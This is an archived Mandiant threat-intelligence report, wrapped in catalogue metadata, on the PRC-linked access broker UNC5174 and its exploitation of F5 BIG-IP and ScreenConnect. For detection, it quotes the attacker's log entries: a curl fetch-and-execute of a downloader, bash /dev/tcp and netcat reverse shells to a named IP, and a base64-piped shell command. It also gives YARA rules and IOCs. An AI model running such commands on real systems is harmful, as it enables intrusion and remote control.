{ "id": "9f64b195-3d9c-47ab-8a6e-5ead3b0fb490", "created_at": "2026-04-06T00:07:01.836524Z", "updated_at": "2026-04-10T13:12:11.133774Z", "deleted_at": null, "sha1_hash": "0b2af77c4267b832a0167558cda51d52f59b31e9", "title": "Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 899122, "plain_text": "Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP\r\n(CVE-2023-46747) and ScreenConnect\r\nBy Mandiant\r\nPublished: 2024-03-21 · Archived: 2026-04-05 17:59:01 UTC\r\nWritten by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen\r\nDuring the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation\r\nof CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface. Additionally, in February 2024, we\r\nobserved exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor. This mix of custom\r\ntooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be\r\nunique to a People's Republic of China (PRC) threat actor, UNC5174.\r\nMandiant assesses UNC5174 (believed to use the persona \"Uteus\") is a former member of Chinese hacktivist\r\ncollectives that has since shown indications of acting as a contractor for China's Ministry of State Security (MSS)\r\nfocused on executing access operations. UNC5174 has been observed attempting to sell access to U.S. defense\r\ncontractor appliances, UK government entities, and institutions in Asia in late 2023 following CVE-2023-46747\r\nexploitation. In February 2024, UNC5174 was observed exploiting ConnectWise ScreenConnect\r\nvulnerability (CVE-2024-1709) to compromise hundreds of institutions primarily in the U.S. and Canada.\r\nTargeting and Timeline\r\nUNC5174 has been linked to widespread aggressive targeting and intrusions of Southeast Asian and U.S. research\r\nand education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs), and\r\nU.S. and UK government organizations during October and November 2023, as well as in February 2024.\r\nThe actor appears primarily focused on executing access operations. Mandiant observed UNC5174 exploiting\r\nvarious vulnerabilities during this time.\r\nConnectWise ScreenConnect Vulnerability CVE-2024-1709\r\nF5 BIG-IP Configuration Utility Authentication Bypass Vulnerability CVE-2023-46747\r\nAtlassian Confluence CVE-2023-22518\r\nLinux Kernel Exploit CVE-2022-0185\r\nZyxel Firewall OS Command Injection Vulnerability CVE-2022-30525\r\nInvestigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command\r\nhistory. This history detailed artifacts of extensive reconnaissance, web application fuzzing, and aggressive\r\nscanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania,\r\nand Hong Kong regions. Additionally, key strategic targets like think tanks in the U.S. and Taiwan were identified;\r\nhowever, Mandiant does not have significant evidence to determine successful exploitation of these targets.\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 1 of 16\n\nFigure 1: UNC5174 global targeting map\r\nInitial Disclosure of CVE-2023-46747\r\nOn Oct. 25, 2023, Praetorian published an advisory and proof-of-concept (PoC) for a zero-day (0-day)\r\nvulnerability (CVE-2023-46747) impacting the F5 BIG-IP Traffic Management User Interface (TMUI). This\r\nvulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating\r\nsystem as the root user. The blog post also detailed steps required for successful exploitation, involving Apache\r\nJServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute\r\nbash commands via the F5 Traffic Management Shell (TMSH). Following the initial advisory, F5 published a\r\nsecurity advisory on Oct. 27, 2023. The advisory detailed the affected F5 appliance versions and provided a script\r\nfor mitigating the vulnerability. Mandiant strongly recommends organizations apply the mitigation script to\r\nvulnerable F5 BIG-IP appliances and investigate for evidence of compromise.\r\nEvidence of Exploitation\r\nMandiant identified UNC5174 compromising F5 BIG-IP appliances, which exhibited evidence of administrative\r\nuser account creation and execution of bash commands via the TMSH. Through investigation it became apparent\r\nthat UNC5174 had exploited CVE-2023-46747 to perform actions on the appliance like account creation. The\r\nanomalous behavior appeared first in the \"/var/log/audit\" log file, which recorded evidence of the creation of new\r\nadmin user accounts and bash commands executed by the newly created user via the F5's TMSH. This action also\r\nresulted in the creation of the same new user account on the underlying operating system, including the following\r\nentries:\r\n/etc/passwd\r\n/etc/shadow\r\nThe creation of the user's home directory was also replicated at /home/\u003cusername\u003e.\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 2 of 16\n\nOct 28 01:52:32 localhost.localdomain notice tmsh[30629]:\r\n01420002:5: AUDIT - pid=30629 user=root folder=/Common\r\nmodule=(tmos)# status=[Command OK] cmd_data=create\r\nauth user f5support3 password **** shell bash partition-access\r\nadd { all-partitions { role admin } }\r\nOct 28 01:53:29 localhost.localdomain notice icrd_child[18778]:\r\n01420002:5: AUDIT - pid=18778 user=f5support3 folder=/Common\r\nmodule=(tmos)# status=[Command OK] cmd_data=run util bash -c id\r\nTable 1: Compromised host Audit log. Note the compromised appliance recorded timestamps in local time.\r\nThe \"/var/log/restjavad-audit.log\" recorded evidence of malicious requests to the REST API, including user\r\naccount, HTTP request method, API endpoint, and source IP address. In the following example, UNC5174\r\nauthenticated and executed bash commands on the underlying operating system as the newly created user\r\n\"f5support3\". The following log entries show the f5support3 user executing bash commands. The body of the\r\nPOST request contains the bash command being executed.\r\n[I][8602][27 Oct 2023 14:53:29 UTC][ForwarderPassThroughWorker]\r\n{\"user\":\"local/f5support3\",\"method\":\"POST\",\"uri\":\"http://localhost:8100\r\n/mgmt/tm/util/bash\",\"status\":200,\"from\":\"154.12.177[.]8\"}\r\n[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker]\r\n{\"user\":\"local/f5support3\",\"method\":\"PATCH\",\"uri\":\"http://localhost:8100\r\n/mgmt/shared/authz/users/f5support3\",\"status\":200,\"from\":\"154.12.177[.]8\"}\r\nTable 2: UNC5174 bash commands with newly created username f5support3\r\nUNC5174 then created new accounts via the F5 TMUI, attempting to appear as legitimate F5-related user\r\naccounts, including:\r\nF5support3\r\nF5_admin\r\nf5_support\r\nPost-Exploitation Tactics by UNC5174 After Successful Account Creation\r\nSNOWLIGHT, GOHEAVY, GOREVERSE, and SUPERSHELL\r\nUNC5174 leveraged their newly minted TMSH access to download and execute \"/tmp/watchsys\" using a cURL\r\ncommand. Mandiant's analysis of the file \"/tmp/watchsys\" identified it as a new 64-bit ELF downloader we have\r\nnamed SNOWLIGHT.\r\nThe following chained bash` commands attributed to UNC5174 will perform the following actions related to\r\nSNOWLIGHT: \r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 3 of 16\n\n1. Delete any file previously written to /tmp/watchsys.\r\n2. Forcefully kill the process \"watchsys\" if it is running.\r\n3. Download the file from a remote URL to /tmp/watchsys.\r\n4. Modify the permissions of /tmp/watchsys to allow execution.\r\n5. Execute /tmp/watchsys using \"nohup\", so that the process will continue executing after the parent process\r\nis terminated.\r\n6. Perform a directory listing of the /tmp directory.\r\nNov 2 07:29:47 localhost.localdomain notice icrd_child[17602]:\r\n01420002:5: AUDIT - pid=17602 user=admin folder=/Common\r\nmodule=(tmos)# status=[Command OK] cmd_data=run util bash\r\n-c \"rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys\r\nhttp://172.104.124[.]74/LG;chmod 755 /tmp/watchsys;nohup\r\n/tmp/watchsys \u0026;ls -al /tmp/\"\r\nTable 3: UNC5174 cURL command to download SNOWLIGHT downloader\r\nFigure 2: Excerpt showing SNOWLIGHT's decoding routine and memory injection method\r\nSNOWLIGHT is a downloader written in C and is designed to run on Linux systems. SNOWLIGHT uses raw\r\nsockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with\r\nthe command-and-control (C2 or C\u0026C) server, though one variant has been observed using a fake HTTP header\r\nfor an initial beacon packet. Upon successful communication with its C2 server, a secondary ELF file is\r\ndownloaded and XOR decoded using the key \"0x99\".\r\nFinally, the decoded secondary ELF file is loaded into memory using Linux's \"sys_memfd_create\" and executed\r\nvia \"fexecve\". The payload is downloaded directly into memory and executed without ever being written to disk.\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 4 of 16\n\nIn the SNOWLIGHT variants we observed, the payloads process will run under the hard-coded name of \"\". This is\r\nidentifiable in a running process list as a \"memfd\" process.\r\nThe SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that\r\nMandiant has dubbed GOHEAVY from infrastructure related to SUPERSHELL administrators. This payload is\r\nthen executed in-memory via the previously described memfd method. The resultant GOHEAVY process-related\r\nartifacts were observed on the compromised F5 appliance:\r\nProcess Name: memfd:a (deleted)\r\nPath: empty (due to the executable being un-backed)\r\nArgs: ?\r\nUser: root\r\nGOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell\r\n(SSH). Mandiant observed UNC5174 deploy GOREVERSE, which called back to C2 infrastructure we previously\r\nobserved hosting the SUPERSHELL framework. SUPERSHELL is a publicly available C2 framework published\r\non GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL. \r\nMandiant observed evidence of UNC5174 issuing commands to connect bash and netcat TCP reverse shells back\r\nto the same infrastructure hosting GOREVERSE and SUPERSHELL payloads on port 443.\r\nNov 2 07:16:15 localhost.localdomain notice icrd_child[18778]:\r\n01420002:5: AUDIT - pid=18778 user=admin folder=\r\n/Common module=(tmos)# status=[Command OK] cmd_data=run util\r\nbash -c \"bash -i /dev/tcp/172.104.124[.]74/443 0\u003e\u00261 \u0026\"|\r\nTable 4: UNC5174 command to download a bash web shell\r\nNov 2 07:30:37 localhost.localdomain notice icrd_child[18778]:\r\n01420002:5: AUDIT - pid=18778 user=admin folder=/Common\r\nmodule=(tmos)# status=[Command OK] cmd_data=run util bash\r\n-c \"nc 172.104.124[.]74 443 -e /bin/bash \u0026\"\r\nTable 5: UNC5174 command to download a netcat web shell\r\nInternal Reconnaissance\r\nShell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor\r\ndownloading the file \"/tmp/ss\" from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads,\r\nas well as GitHub, using the cURL command.\r\ncurl -o /tmp/ss hxxp://172.104.124[.]74/App-amd64linux-noupx\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 5 of 16\n\ncurl -o /tmp/ss hxxps://github[.]com/1n7erface/Template/releases\r\n/download/v1.2.5/App-amd64linux-noupx\r\nTable 6: UNC5174 command downloading unidentified additional tooling suspected of internal reconnaissance\r\nfunctionality\r\nThe file \"/tmp/ss\" was not recoverable at the time of analysis; however, the GitHub URL resource\r\nhttps://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with\r\nChinese-language instructions. Execution of \"/tmp/ss\" was recorded in shell history, and command-line arguments\r\nindicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance using the tool\r\nFSCAN.\r\n./ss -i \u003cInternal CIDR block\u003e\r\nTable 7: UNC5174 command to scan internal subnet ranges from compromised F5 appliances\r\nGOHEAVY Tunneler: A Closer Look\r\nUNC5174 employs a Golang-based tunneler tool named GOHEAVY, obfuscated using GOBFUSCATE for added\r\nstealth. This tool leverages the Gin framework to manage traffic routing functionalities. Mandiant observed\r\nGOHEAVY engaging in simultaneous communication with an external C2 server operated by SUPERSHELL\r\nadministrators while opening and listening on a vast number of local UDP ports. Interestingly, GOHEAVY\r\ncontinuously broadcasts the string \"SpotUdp\" to existing network interfaces.\r\nThis behavior suggests the tool's purpose lies in establishing covert communication channels and potentially\r\nfacilitating lateral movement within compromised networks. The continuous \"SpotUdp\" broadcast might serve as\r\na beacon for identifying other compromised machines running GOHEAVY within the same network\r\nIn addition to GOHEAVY, Mandiant observed the presence of various other tools common in red teaming,\r\nincluding:\r\nSLIVER client\r\nFFUFP\r\nSQLMAP\r\nDIRBUSTER\r\nMETASPLOIT\r\nAFROG penetration testing tool\r\nNUCLEI vulnerability scanning templates\r\nUNC5174 Closes the Door Behind Them\r\nMandiant observed an unusual behavior by UNC5174 following their initial access on the compromised\r\nappliance. After backdoor accounts were configured, they attempted to self-patch the vulnerability using an F5-\r\nprovided mitigation script \"mitigation.sh\". Mandiant assesses that this was an attempt to limit subsequent\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 6 of 16\n\nexploitation of the system by additional unrelated threat actors attempting to access the appliance. The additional\r\ncommands were observed during their initial access on the compromised appliance:\r\nbash execution CVE-2023-46747 command run for account root6 from (HK) 61.239.68.73\r\n28/10 14:16:23 deleted user root6\r\n28/10 14:27:35: ran command cmd_data=run /util bash -c /root/mitigation.sh -u\r\n4/11/2023 03:36:30 /tmp/.del\r\nUNC5174 Targets ScreenConnect Vulnerability\r\nOn Feb. 21, 2024, the actor \"uteus\" claimed in forum postings to have successfully exploited the vulnerability\r\nCVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally,\r\nprimarily in the U.S. and Canada. \r\nMandiant obtained the output of the actor's exploit, which showed the actor added the admin user \"cvetest\" to\r\nScreenConnect instances belonging to numerous organizations. Mandiant has observed other threat actors\r\nsimilarly adding admin accounts at multiple victim organizations.  Mandiant was also able to confirm the\r\ncompromise of several ScreenConnect instances and the presence of unauthorized users added by the uteus\r\npersona tracked as UNC5174. Mandiant assesses with moderate confidence the other organizations listed by uteus\r\nwere also compromised.\r\nFigure 3: Geographic distribution of UNC5174 ScreenConnect targeting\r\nAttribution\r\nMandiant has identified a new access operations group UNC5174 that uses the personas \"Uteus\" (alternate\r\nspelling \"uetus\") on underground forums, which we assess with moderate confidence operates from China.\r\nUNC5174 was linked with several hacktivist collectives including \"Dawn Calvary\" and \"Genesis Day\" prior to\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 7 of 16\n\n2023 and has also claimed to be affiliated with the PRC MSS as an access broker and possible contractor who\r\nconducts for profit intrusions.\r\nChinese Hacktivists, UNC302, and UNC5174 Link to MSS Contractors\r\nMandiant assesses UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives \"Dawn\r\nCalvary\" and has collaborated with \"Genesis Day\" / \"Xiaoqiying\" and \"Teng Snake.\" This individual appears to\r\nhave departed these groups in mid-2023 and has since focused on executing access operations with the intention\r\nof brokering access to compromised environments.\r\nAs part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access\r\nbroker acting as an MSS contractor. The actor claimed MSS affiliation in dark web forums, claiming tacit backing\r\nof an unspecified MSS-related APT actor. Additionally, the impacted organizations targeted by UNC5174,\r\nincluding U.S. defense and UK government entities, were targeted concurrently by distinct known MSS access\r\nbrokers UNC302, which were previously indicted by the U.S. Department of Justice in 2020. \r\nOn Oct. 10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address\r\nof several government entities. This activity was associated with the UNC5174 pseudonym \"Uteus\", which shared\r\nthis purported access to a U.S. military contractor and UK government organization in an online communication.\r\nThe same IP address targeted through the previously described CVE-2023-46747 exploitation appeared in\r\ncommunications from this access broker, claiming successful exploitation of Confluence vulnerability CVE-2023-\r\n22515. Details of the intrusion were discovered within communications on a dark web forum. The Uteus persona\r\nindicated they had utilized a public proof of concept to perform activities on compromised systems. Notably,\r\nUteus is believed to be distinct from the entity \"Xiaoqiying,\" which has independently claimed to not be employed\r\nby the Chinese Government in a Telegram channel operated by the group.\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 8 of 16\n\nFigure 4: Telegram channel for Xiaoqiying claiming no employment with the Chinese government\r\nBased on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access\r\nbroker persona for UNC5174, used to sell obtained access to compromised systems. While definitive connections\r\ncannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302,\r\nwhich suggests they operate within an MSS initial access broker landscape. These similarities suggest possible\r\nshared exploits and operational priorities between these threat actors, although further investigation is required for\r\ndefinitive attribution.\r\nOutlook and Implications\r\nUNC5174 exploitation of CVE-2023-46747 as a N-day vulnerability in tandem with recent exploitation of\r\nConnectwise ScreenConnect vulnerability CVE-2024-1709 demonstrates PRC-related threat actors' systematized\r\napproach to achieving access to targets of strategic or political interest to the PRC. China-nexus actors continue to\r\nconduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable\r\nespionage operations at scale. These operations often include rapid exploitation of recently disclosed\r\nvulnerabilities using custom or publicly available proof-of-concept exploits. UNC5174 and UNC302 operate\r\nwithin this model, and their operations provide insight into the initial access broker ecosystem leveraged by the\r\nMSS to target strategically interesting global organizations. Mandiant believes that UNC5174 will continue to\r\npose a threat to organizations in the academic, NGO, and government sectors specifically in the United States,\r\nCanada, Southeast Asia, Hong Kong, and the United Kingdom.\r\nRemediation and Hardening\r\nMandiant recommends performing the following remediation and hardening actions on impacted F5 appliances:\r\nRestrict access to the F5 TMUI from the internet.\r\nImmediately apply the F5 mitigation script published in [K000137353] to any vulnerable F5 appliances.\r\nInvestigate vulnerable F5 appliances for evidence of compromise.\r\nIn the event of F5 compromise:\r\nReview appliance configurations for unauthorized modifications.\r\nReview file system and operating system (OS) artifacts for evidence of privileged account creation and\r\nremove any unauthorized accounts.\r\nConsider revoking and re-issuing sensitive cryptographic material such as certificates and private keys that\r\nmay have been accessible to a threat actor.\r\nFor impacted ScreenConnect instances, Mandiant recommends that organizations with an on-premises\r\ncontroller read our latest ScreenConnect remediation and hardening guide.\r\nIndicators of Compromise (IOCs)\r\nNetwork IOCs\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 9 of 16\n\nIP Address ASN NetBlock Location\r\n118.140.151[.]242  9304 HGC Global Communications Limited (HK)\r\n61.239.68[.]73  9269 Hong Kong Broadband Network Ltd. (HK)\r\n172.245.68[.]110 36352  Colocrossing (U.S.)\r\nURLs\r\nURL Description\r\nhttp://172.245.68[.]110:8888  SUPERSHELL C2\r\nHost IOCs\r\nMD5 Hash Filename Type Code Family\r\nc867881c56698f938b4e8edafe76a09b LG ELF SNOWLIGHT\r\ndf4603548b10211f0aa77d0e9a172438 N/A ELF SNOWLIGHT\r\n0951109dd1be0d84a33d52c135ba9c97 N/A ELF SNOWLIGHT\r\n9c3bf506dd19c08c0ed3af9c1708a770 memfd:a ELF N/A\r\n0ba435460fb7622344eec28063274b8a undefined ELF SNOWLIGHT\r\na78bf3d16349eba86719539ee8ef562d N/A ELF SNOWLIGHT\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 10 of 16\n\nHost Based Indicators (Commands)\r\ncmd_data=run util bash -c \"echo\r\ndG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc=\r\n| base64 -d | sh\" \"tmsh -q -c 'cd /;show running-config recursive'\"\r\nrun util bash -c \"bash -i /dev/tcp/172.104.124.74/443 0\u003e\u00261 \u0026\"\r\nDetections\r\nrule M_Backdoor_GOREVERSE_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is designed to detect events related\r\nto goreverse. GOREVERSE is a publicly available reverse shell\"\r\n md5 = \"5c175ea3664279d6c0c2609844de6949\"\r\n platforms = \"Windows,Linux,MacOS\"\r\n malware_family = \"GOREVERSE\"\r\n strings:\r\n $cc_main_fork_amd64 = { 41 81 39 74 72 75 65 75 ?? 48 8B\r\n[5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B }\r\n $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48\r\n8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 }\r\n $cc_rssh = \"rssh\" fullword\r\n $cc_validate_dest_len = { 48 83 3D [4] 00 [1-24] 49 83 FC 01\r\n[1-24] 49 C1 E4 05 [1-64] 83 3D [4] 00 }\r\n $str1 = \"--[foreground|fingerprint|proxy|process_name]\r\n-d|--destination \u003cserver_address\u003e\"\r\n $str2 = \"-d or --destination Server connect back address\r\n(can be baked in)\"\r\n $str3 = \"--foreground Causes the client to run without\r\nforking to background\"\r\n $str4 = \"--fingerprint Server public key SHA256 hex\r\nfingerprint for auth\"\r\n $str5 = \"--proxy Location of HTTP connect proxy to use\"\r\n $str6 = \"--process_name Process name shown in\r\ntasklist/process list\"\r\n condition:\r\n ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface)\r\nor (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0)\r\n== 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint16(0) == 0x5a4d\r\nand uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f))\r\nand (all of ($str*) or all of ($cc_*))\r\n}\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 11 of 16\n\nrule M_APT_Downloader_SNOWLIGHT_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is designed to detect\r\nthe SNOWLIGHT code family\"\r\n md5 = \"0951109dd1be0d84a33d52c135ba9c97\"\r\n platforms = \"Linux\"\r\n malware_family = \"SNOWLIGHT\"\r\n strings:\r\n $xor99 = { 80 31 99 48 FF C1 89 CE 29 EE 39 C6\r\n7C F2 48 63 D2 48 89 EE 44 89 E7 }\r\n $memfdcreate = { BA 01 00 00 00 BE 3B 0B 40\r\n00 BF 3F 01 00 00 E8 8C FE FF FF }\r\n condition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nA106-917 Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, Exploitation\r\nA106-916 Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, User Authentication\r\nA107-059 Application Vulnerability - CVE-2024-1708, Exploitation, Variant #1\r\nA107-056 Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1\r\nMITRE ATT\u0026CK\r\nMandiant has observed UNC5174 use the following techniques:\r\nInitial Access T1190 Exploit Public-Facing Application\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 12 of 16\n\nDefense Evasion T1027 Obfuscated Files or Information\r\n  T1070.004 File Deletion\r\n  T1140 Deobfuscate/Decode Files or Information\r\n  T1222.002 Linux and Mac File and Directory Permissions Modification\r\n  T1601.001 Patch System Image\r\nDiscovery T1016 System Network Configuration Discovery\r\n  T1049 System Network Connections Discovery\r\n  T1082 System Information Discovery\r\n  T1083 File and Directory Discovery\r\nCommand and Control T1095 Non-Application Layer Protocol\r\n  T1105 Ingress Tool Transfer\r\n  T1572 Protocol Tunneling\r\n  T1573.002 Asymmetric Cryptography\r\nExecution T1059 Command and Scripting Interpreter\r\n  T1059.004 Unix Shell\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 13 of 16\n\nPersistence T1136.001 Local Account\r\nImpact T1531 Account Access Removal\r\nCredential Access T1003.008 /etc/passwd and /etc/shadow\r\nResource Development T1608.003 Install Digital Certificate\r\nMandiant has observed UNC302 use the following techniques:\r\nInitial Access T1133 External Remote Services\r\n  T1189 Drive-by Compromise\r\n  T1190 Exploit Public-Facing Application\r\nCollection T1213 Data from Information Repositories\r\n  T1560 Archive Collected Data\r\n  T1560.001 Archive via Utility\r\nPersistence T1505.003 Web Shell\r\nDefense Evasion T1027 Obfuscated Files or Information\r\n  T1036 Masquerading\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 14 of 16\n\nT1070.004 File Deletion\r\n  T1112 Modify Registry\r\n  T1134 Access Token Manipulation\r\n  T1497 Virtualization/Sandbox Evasion\r\nImpact T1529 System Shutdown/Reboot\r\nExecution T1059.003 Windows Command Shell\r\n  T1059.005 Visual Basic\r\n  T1203 Exploitation for Client Execution\r\nDiscovery T1012 Query Registry\r\n  T1016 System Network Configuration Discovery\r\n  T1057 Process Discovery\r\n  T1082 System Information Discovery\r\n  T1083 File and Directory Discovery\r\n  T1518 Software Discovery\r\nCredential Access T1003 OS Credential Dumping\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 15 of 16\n\nLateral Movement T1021.001 Remote Desktop Protocol\r\nResource Development T1583.003 Virtual Private Server\r\n  T1584 Compromise Infrastructure\r\nCommand and Control T1071.001 Web Protocols\r\n  T1071.004 DNS\r\n  T1095 Non-Application Layer Protocol\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nhttps://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect" ], "report_names": [ "initial-access-brokers-exploit-f5-screenconnect" ], "threat_actors": [ { "id": "4fd2e187-fea2-421a-870c-11be83231fd5", "created_at": "2023-11-04T02:00:07.652728Z", "updated_at": "2026-04-10T02:00:03.384073Z", "deleted_at": null, "main_name": "Xiaoqiying", "aliases": [ "Genesis Day", "Teng Snake" ], "source_name": "MISPGALAXY:Xiaoqiying", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8210e297-e5a7-4830-b7a3-1c8abc8e862f", "created_at": "2023-01-06T13:46:39.407579Z", "updated_at": "2026-04-10T02:00:03.316455Z", "deleted_at": null, "main_name": "BRONZE SPRING", "aliases": [ "UNC302" ], "source_name": "MISPGALAXY:BRONZE SPRING", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b302cfdb-30c9-4dce-a968-d2398dda820d", "created_at": "2024-03-28T02:00:05.789775Z", "updated_at": "2026-04-10T02:00:03.611467Z", "deleted_at": null, "main_name": "UNC5174", "aliases": [ "Uteus" ], "source_name": "MISPGALAXY:UNC5174", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9d5075e3-9fa3-40f8-9c2b-9cd1fc7a6ffe", "created_at": "2025-08-07T02:03:24.670367Z", "updated_at": "2026-04-10T02:00:03.801961Z", "deleted_at": null, "main_name": "BRONZE SPRING", "aliases": [ "UNC302" ], "source_name": "Secureworks:BRONZE SPRING", "tools": [ "China Chopper", "Mimikatz", "OwaAuth" ], "source_id": "Secureworks", "reports": null }, { "id": "8bcbeb8a-111b-4ea1-a72b-5c7abd8ef132", "created_at": "2025-11-01T02:04:53.050049Z", "updated_at": "2026-04-10T02:00:03.774442Z", "deleted_at": null, "main_name": "BRONZE SNOWDROP", "aliases": [ "UNC5174 " ], "source_name": "Secureworks:BRONZE SNOWDROP", "tools": [ "Metasploit", "SNOWLIGHT", "SUPERSHELL", "Sliver", "VShell" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434021, "ts_updated_at": 1775826731, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0b2af77c4267b832a0167558cda51d52f59b31e9.pdf", "text": "https://archive.orkl.eu/0b2af77c4267b832a0167558cda51d52f59b31e9.txt", "img": "https://archive.orkl.eu/0b2af77c4267b832a0167558cda51d52f59b31e9.jpg" } }